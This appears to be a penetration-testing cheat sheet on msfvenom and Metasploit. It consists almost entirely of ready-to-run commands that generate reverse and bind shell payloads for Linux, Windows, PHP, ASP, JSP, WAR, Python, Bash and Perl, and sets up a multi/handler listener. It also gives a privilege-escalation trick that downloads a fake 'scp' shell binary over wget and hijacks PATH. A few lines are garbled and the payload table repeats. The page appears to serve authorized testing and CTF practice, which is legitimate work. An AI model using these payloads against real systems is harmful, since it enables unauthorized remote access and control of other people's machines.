msfvenom

Show all payloads 
msfvenom -l payloads 
 
Show all payload formats 
msfvenom -l formats 
 
Generate a payload 
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name> 
 
Common payloads 
meterpreter 
linux/x86/meterpreter/reverse_tcp 
linux x86 reverse shell 
linux/x64/meterpreter/reverse_tcp 
linux x64 reverse shell 
windows/meterpreter/reverse_tcp 
windows x86 reverse shell 
windows/x64/meterpreter/reverse_tcp 
windows x64 reverse shell 
 
Staged 
linux/x86/shell/bind_tcp 
linux x86 bind shell 
linux/x86/shell/reverse_tcp 
linux x86 reverse shell 
windows/shell/bind_tcp 
windows x86 bind shell 
windows/shell/reverse_tcp 
windows x86 reverse shell 
 
Nonstaged 
linux/x86/shell_bind_tcp 
linux x86 bind shell 
linux/x86/shell_reverse_tcp 
linux x86 reverse shell 
windows/shell_bind_tcp 
windows x86 bind shell 
windows/shell_reverse_tcp 
windows x86 reverse shell 
​
MSFVENOM PAYLOAD
Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
PHP
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
​
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl
Listener
Metasploit
use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
​
this creates a command for scp. 
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
wget 192.168.1.23/scp -O /tmp/s** # transfer the exec binary over to Sufferance chmod 755 /tmp/scp 
export PATH=/tmp:$PATH --> it sets the tmp as the path  
 /usr/local/bin/ # it'll now call our "special" scp binary in /tmp instead

Download files via curl from website

meterpreter commands

Last modified 10mo ago

linux/x86/meterpreter/reverse_tcp	linux x86 reverse shell
linux/x64/meterpreter/reverse_tcp	linux x64 reverse shell
windows/meterpreter/reverse_tcp	windows x86 reverse shell
windows/x64/meterpreter/reverse_tcp	windows x64 reverse shell

linux/x86/shell/bind_tcp	linux x86 bind shell
linux/x86/shell/reverse_tcp	linux x86 reverse shell
windows/shell/bind_tcp	windows x86 bind shell
windows/shell/reverse_tcp	windows x86 reverse shell

linux/x86/shell_bind_tcp	linux x86 bind shell
linux/x86/shell_reverse_tcp	linux x86 reverse shell
windows/shell_bind_tcp	windows x86 bind shell
windows/shell_reverse_tcp	windows x86 reverse shell